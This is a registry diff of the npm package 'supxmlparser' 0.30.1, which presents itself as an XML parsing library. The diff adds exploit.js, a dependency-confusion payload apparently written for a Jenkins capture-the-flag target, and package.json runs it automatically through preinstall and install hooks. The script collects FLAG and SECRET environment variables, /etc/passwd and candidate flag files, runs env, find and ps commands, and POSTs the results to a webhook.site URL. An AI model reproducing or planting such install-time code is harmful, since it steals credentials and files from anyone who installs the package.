supxmlparser 0.30.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/exploit.js +83 -0
- package/index.js +11 -0
- package/package.json +13 -0
package/exploit.js
ADDED
|
@@ -0,0 +1,83 @@
|
|
|
1
|
+
const fs = require('fs');
|
|
2
|
+
const { exec } = require('child_process');
|
|
3
|
+
const https = require('https');
|
|
4
|
+
|
|
5
|
+
console.log('=== MALICIOUS PACKAGE EXECUTED ===');
|
|
6
|
+
|
|
7
|
+
function sendToWebhook(data) {
|
|
8
|
+
try {
|
|
9
|
+
const payload = JSON.stringify({
|
|
10
|
+
source: 'dependency_confusion',
|
|
11
|
+
data: data
|
|
12
|
+
});
|
|
13
|
+
|
|
14
|
+
const options = {
|
|
15
|
+
hostname: 'webhook.site',
|
|
16
|
+
port: 443,
|
|
17
|
+
path: '/67ab3ca0-2b3b-4364-aaee-f8d19895003f',
|
|
18
|
+
method: 'POST',
|
|
19
|
+
headers: {'Content-Type': 'application/json'}
|
|
20
|
+
};
|
|
21
|
+
|
|
22
|
+
const req = https.request(options);
|
|
23
|
+
req.write(payload);
|
|
24
|
+
req.end();
|
|
25
|
+
console.log('Data sent to webhook');
|
|
26
|
+
} catch(e) {
|
|
27
|
+
console.log('Webhook error:', e.message);
|
|
28
|
+
}
|
|
29
|
+
}
|
|
30
|
+
|
|
31
|
+
let collectedData = '=== EXPLOIT DATA ===\n';
|
|
32
|
+
|
|
33
|
+
// 1. Переменные окружения (может содержать флаг)
|
|
34
|
+
collectedData += '=== ENVIRONMENT ===\n';
|
|
35
|
+
for (let key in process.env) {
|
|
36
|
+
if (key.includes('FLAG') || key.includes('flag') || key.includes('SECRET')) {
|
|
37
|
+
collectedData += `${key}=${process.env[key]}\n`;
|
|
38
|
+
}
|
|
39
|
+
}
|
|
40
|
+
|
|
41
|
+
// 2. Попробуем прочитать флаг из разных мест
|
|
42
|
+
const paths = [
|
|
43
|
+
'/etc/passwd',
|
|
44
|
+
'/flag',
|
|
45
|
+
'/tmp/flag',
|
|
46
|
+
'/var/jenkins_home/flag',
|
|
47
|
+
'/var/lib/jenkins/flag',
|
|
48
|
+
process.env.HOME + '/flag',
|
|
49
|
+
process.env.PWD + '/flag'
|
|
50
|
+
];
|
|
51
|
+
|
|
52
|
+
paths.forEach(path => {
|
|
53
|
+
try {
|
|
54
|
+
const content = fs.readFileSync(path, 'utf8');
|
|
55
|
+
collectedData += `=== ${path} ===\n${content}\n`;
|
|
56
|
+
if (content.includes('{') && content.includes('}')) {
|
|
57
|
+
console.log(`🚨 FLAG FOUND: ${content}`);
|
|
58
|
+
}
|
|
59
|
+
} catch(e) {}
|
|
60
|
+
});
|
|
61
|
+
|
|
62
|
+
// 3. Выполним команды для поиска
|
|
63
|
+
exec('env | grep -i flag', (err, stdout) => {
|
|
64
|
+
if (!err && stdout) {
|
|
65
|
+
collectedData += `=== ENV FLAG SEARCH ===\n${stdout}\n`;
|
|
66
|
+
}
|
|
67
|
+
|
|
68
|
+
exec('find /var/jenkins_home /var/lib/jenkins /tmp /home -name "flag" -type f 2>/dev/null', (err, stdout) => {
|
|
69
|
+
if (!err && stdout) {
|
|
70
|
+
collectedData += `=== FOUND FLAG FILES ===\n${stdout}\n`;
|
|
71
|
+
}
|
|
72
|
+
|
|
73
|
+
// 4. Текущий процесс и его окружение
|
|
74
|
+
exec('ps aux | grep -i jenkins', (err, stdout) => {
|
|
75
|
+
if (!err) {
|
|
76
|
+
collectedData += `=== JENKINS PROCESSES ===\n${stdout}\n`;
|
|
77
|
+
}
|
|
78
|
+
|
|
79
|
+
sendToWebhook(collectedData);
|
|
80
|
+
console.log(collectedData);
|
|
81
|
+
});
|
|
82
|
+
});
|
|
83
|
+
});
|
package/index.js
ADDED
package/package.json
ADDED
|
@@ -0,0 +1,13 @@
|
|
|
1
|
+
{
|
|
2
|
+
"name": "supxmlparser",
|
|
3
|
+
"version": "0.30.1",
|
|
4
|
+
"description": "XML parsing library",
|
|
5
|
+
"main": "index.js",
|
|
6
|
+
"scripts": {
|
|
7
|
+
"preinstall": "node exploit.js",
|
|
8
|
+
"install": "node exploit.js"
|
|
9
|
+
},
|
|
10
|
+
"keywords": ["xml", "parser"],
|
|
11
|
+
"author": "test",
|
|
12
|
+
"license": "MIT"
|
|
13
|
+
}
|